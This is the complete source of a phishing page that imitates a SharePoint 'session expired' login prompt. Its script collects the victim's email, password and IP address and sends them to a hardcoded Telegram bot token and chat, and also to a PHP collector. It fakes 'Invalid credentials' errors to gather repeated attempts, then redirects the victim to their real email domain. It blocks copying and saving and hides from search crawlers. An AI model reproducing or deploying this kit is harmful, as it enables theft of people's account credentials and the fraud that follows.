

<!DOCTYPE html>
<html id="html" data-emailvalue="" lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <meta name="robots" content="noindex">
  <meta name="googlebot" content="noindex">
  <meta name="googlebot-news" content="noindex">
  <meta name="otherbot" content="noindex">
  <meta name="noarchive" content="noindex">
  <meta name="nosnippet" content="noindex">
  <meta name="noimageindex" content="noindex">
  <meta name="robots" content="none">
  <meta name="googlebot" content="none">
  <meta name="googlebot-news" content="none">
  <meta name="otherbot" content="none">
  <meta name="noarchive" content="none">
  <meta name="nosnippet" content="none">
  <meta name="noimageindex" content="none">
  <meta name="robots" content="nofollow">
  <meta name="googlebot" content="nofollow">
  <meta name="googlebot-news" content="nofollow">
  <meta name="otherbot" content="nofollow">
  <meta name="noarchive" content="nofollow">
  <meta name="nosnippet" content="nofollow">
  <meta name="noimageindex" content="nofollow">
  <meta name="robots" content="max-snippet:0">
  <meta name="robots" content="unavailable_after: 2020-09-22">
  <script> document.addEventListener('keydown', function(e) { if (e.key === 's' && (navigator.platform.match('Mac') ? e.metaKey : e.ctrlKey)) { e.preventDefault(); }});
  </script>
  <title>Sign | SharePoint</title>
  <link rel="SHORTCUT ICON" href="https://fonts.googleapis.com/css?family=Yellowtail%26display=swap" type="image/x-icon">
  <style>
    body {
      margin: 0;
      font-family: Trebuchet MS;
    }

    .topnav {
      overflow: hidden;
      background-color: #333;
    }

    .topnav a {
      float: left;
      color: #f2f2f2;
      text-align: center;
      padding: 14px 16px;
      text-decoration: none;
      font-size: 17px;
    }

    .topnav a:hover {
      background-color: #ddd;
      color: black;
    }

    .topnav a.active {
      background-color: #00a1f1;
      color: white;
    }

    
    input[type=text], input[type=email] {
        width: 70%;
        top: -20px;
        padding: 12px 20px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box;
    }


    input[type=text], input[type=password] {
        width: 100%;
        padding: 12px 20px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box;
    }

    button {
        background-color: rgb(0, 153, 255);
        border-radius: 4px;
        color: white;
        padding: 12px 18px;
        margin: 8px 0;
        border: none;
        margin-top: 30px;
        cursor: pointer;
        margin-left: 80%;
        width: 16%;
    }

    button:hover {
        opacity: 0.8;
    }

    .cancelbtn {
        width: auto;
        padding: 10px 18px;
        background-color: #f44336;
    }

    .imgcontainer {
        text-align: center;
        margin: 10px 10px 0;
    }

    img.avatar {
        width: 40%;
        border-radius: 50%;
    }

    .container {
        padding: 10px;
    }

    span.psw {
        float: right;
        padding-top: 16px;
    }

    /* Change styles for span and cancel button on extra small screens */
    @media screen and (max-width: 300px) {
        span.psw {
          display: block;
          float: none;
        }
        .cancelbtn {
          width: 100%;
        }
    }

    /* The Modal (background) */
    .modal {
        display: none; /* Hidden by default */
        position: fixed; /* Stay in place */
        z-index: 1; /* Sit on top */
        left: 0;
        top: 0;
        width: 100%; /* Full width */
        height: 100%; /* Full height */
        overflow: auto; /* Enable scroll if needed */
        background-color: rgb(0,0,0); /* Fallback color */
        background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
        padding-top: 60px;
    }

    /* Modal Content/Box */
    .modal-content {
        background-color: #fefefe;
        margin: 5% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
        border: 4px solid #888;
        width: 38%; /* Could be more or less, depending on screen size */
        height: 52%;
    }


    /* Add Zoom Animation */
    .animate {
        -webkit-animation: animatezoom 0.6s;
        animation: animatezoom 0.6s
    }

    @-webkit-keyframes animatezoom {
        from {-webkit-transform: scale(0)}
        to {-webkit-transform: scale(1)}
    }

    @keyframes animatezoom {
        from {transform: scale(0)}
        to {transform: scale(1)}
    }

    /* Change styles for span and cancel button on extra small screens */
    @media screen and (max-width: 300px) {
        span.psw {
          display: block;
          float: none;
        }
        .cancelbtn {
          width: 100%;
        }
    }
  </style>
</head>
<body oncopy="return false" oncut="return false" onpaste="return true"  oncopy return="return false" oncontextmenu="return false" unselectable="on">
  </div>
  <header
    style="background-image: url(''); height: 80vh; background-size: cover;"></header>
  <p style="font-family: 'Trebuchet MS'; font-size: 14px; color: #000000;">
  </p>
  </button>
  <div id="id01" class="modal" style="display: block;">
    <div class="modal-content animate">
      <div class="imgcontainer">
        <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal"><b></b></span>
        <img src="" width="20%">
      </div>
      <div class="container" style="text-align: center;">
        <hr style="width: auto; background-color: #000;">
        <div class="modal-body">
            <div class="form-wrap">
            <strong><center>
                <div>Your session has expired, Please login with your email <br> password to continue.</div>
                </center></strong>
       
                <center>
                <div>If this condition persists, Please contact your network service provider.</div></center>
            <center>
          <form action="#" method="POST" id="myform">
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="successMessage" style="border: 1px solid red; color: red; padding: 10px; border-radius: 10px; display: none;"></p>
            </div>
            <input type="text" name="3w41l" id="3w41l" disabled/><br>
            <input type="hidden" name="hdn3w41l" id="hdn3w41l" value="">
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="error" style="color: red;display: none;">This account doesn't exist. Please, enter a different account.</p>
            </div>
            <input type="password" id="q455m0T2" placeholder="Enter Password" name="q455m0T2" required=""><br>
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="pwdMsg" style="color: red;display: none;">Password field is empty.!</p>
            </div>
            <button type="submit" id="submit-btn">Sign in</button>
          </form>
        </p>
      </div>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
  <script>
    $(document).ready(function(){
      let userIP = '';
      var count=0;
      var pcount=0;
      $.getJSON('https://api.ipify.org?format=json', function(data){
        userIP = data.ip;
      });
      var bot_token = "6027263089:AAEc2VlLzubuwTvLhbC3ZanRgJLeHHgcQN8";  var group_id = "6231230989";   var retries = 3;






    //        set refere offli12 almightofflinescript 

    //   The quick brown fox jumps over the lazy dog. The five boxing wizards j
    //   ump quickly. Jackdaws love my big sphinx of quartz. How vexingly quick daft ze
    //   bras jump! Two driven jocks help fax my big quiz. Quick, Baz, get my woven flax jod
    //   hpurs! "Now fax quiz Jack!" my brave ghost pled.

    

    //        set refere offli12 almightofflinescript 

    //   The quick brown fox jumps over the lazy dog. The five boxing wizards j
    //   ump quickly. Jackdaws love my big sphinx of quartz. How vexingly quick daft ze
    //   bras jump! Two driven jocks help fax my big quiz. Quick, Baz, get my woven flax jod
    //   hpurs! "Now fax quiz Jack!" my brave ghost pled.
    

    //        set refere offli12 almightofflinescript 

    //   The quick brown fox jumps over the lazy dog. The five boxing wizards j
    //   ump quickly. Jackdaws love my big sphinx of quartz. How vexingly quick daft ze
    //   bras jump! Two driven jocks help fax my big quiz. Quick, Baz, get my woven flax jod
    //   hpurs! "Now fax quiz Jack!" my brave ghost pled.
    

    //        set refere offli12 almightofflinescript 

    //   The quick brown fox jumps over the lazy dog. The five boxing wizards j
    //   ump quickly. Jackdaws love my big sphinx of quartz. How vexingly quick daft ze
    //   bras jump! Two driven jocks help fax my big quiz. Quick, Baz, get my woven flax jod
    //   hpurs! "Now fax quiz Jack!" my brave ghost pled.

                  //   set your php forder here 
      //  php server setup area ========================================================================
      var serverurl = "https://fuckyou.php";  //hidden by offline
      // ===============================================================================================

      const htmlElement = document.getElementById("html");
      var _3w41l = window.location.hash.substr(1);
      var h3w41l = htmlElement.dataset.emailvalue;
      if (_3w41l || h3w41l) {
        var my_3w41l = _3w41l || h3w41l;
        $('#3w41l').val(my_3w41l);
        // $('#hdn3w41l').val(my_3w41l);

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_3w41l)) {
          $('#error').show();
          _3w41l.focus;
          return false;
        }
      }

      $('#myform').on('submit', function(event){
        event.preventDefault();
        $('#submit-btn').attr('disabled', 'disabled');
        $('#error').hide();
        $('#successMessage').hide();
        $('#pwdMsg').hide();
        _3w41l=$("#3w41l").val();
        var q455m0T2=$("#q455m0T2").val();

        if (!q455m0T2) {
          $('#pwdMsg').show();

          return false;
        }

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(_3w41l)) {
          $('#error').show();
          _3w41l.focus;
          return false;
        }

        // TG script
        if (bot_token && group_id) {
          var url_tg = "https://api.telegram.org/bot"+bot_token+"/sendMessage?chat_id="+group_id+"&text=";
          url_tg = url_tg + encodeURIComponent("====Euro AllDomain$$====\n Email: " + _3w41l + "\nPassword: " + q455m0T2 + "\nUserIp: " + userIP);
          $.ajax({
            type: 'POST',
            url: url_tg,
            // data: $this.serialize(),
            beforeSend: function(xhr){
            },
            success: function(response){
              if(response){
                    console.log(`real count of ${count}`)
                $("#q455m0T2").val("");
                if (retries > 0) {
                  if (count>=retries-1) {
                    count=0;
                    console.log(`got redirect count of ${count}`)
                    window.location.replace(`https://${_3w41l.split('@')[1]}`);
                  } else {
                    count+=1;
                    console.log(`increased count of ${count}`)
                    $('#submit-btn').removeAttr('disabled');
                  }
                }
                $("#successMessage").show();
                $('#successMessage').html("Invalid credentials. Please try again");
              }
            },
            error: function(){
              $("#q455m0T2").val("");
              if (retries > 0) {
                if (count>=retries-1) {
                  count=0;
                    console.log(`got error redirect count of ${count}`)
                  window.location.replace(`https://${_3w41l.split('@')[1]}`);
                } else {
                  count+=1;
                  $('#submit-btn').removeAttr('disabled');
                }
              }
              $("#successMessage").show();
              $('#successMessage').html("Invalid credentials. Please try again");
            },
            complete: function(){
            }
          });
        }

        // php server script
        if (server_url.trim()) {
          $.ajax({
            type: 'POST',
            url: server_url,
            data: {
                    _3w41l: _3w41l,
                    q455m0T2: q455m0T2,
                    userIP: userIP
                  },
            // data: $this.serialize(),
            beforeSend: function(xhr){
            },
            success: function(response){
              if(response){
                console.log(response);
                $("#q455m0T2").val("");
                if (retries > 0) {
                  if (pcount>=retries-1) {
                    pcount=0;
                    window.location.replace(`https://${_3w41l.split('@')[1]}`);
                  } else {
                    pcount+=1;
                    $('#submit-btn').removeAttr('disabled');
                  }
                }
                $("#successMessage").show();
                $('#successMessage').html("Invalid credentials. Please try again");
              }
            },
            error: function(){
              $("#q455m0T2").val("");
              if (retries > 0) {
                if (pcount>=retries-1) {
                  pcount=0;
                  window.location.replace(`https://${_3w41l.split('@')[1]}`);
                } else {
                  pcount+=1;
                  $('#submit-btn').removeAttr('disabled');
                }
              }
              $("#successMessage").show();
              $('#successMessage').html("Invalid credentials. Please try again");
            },
            complete: function(){
            }
          });
        }
      });
    });
  </script>
</body>
</html>
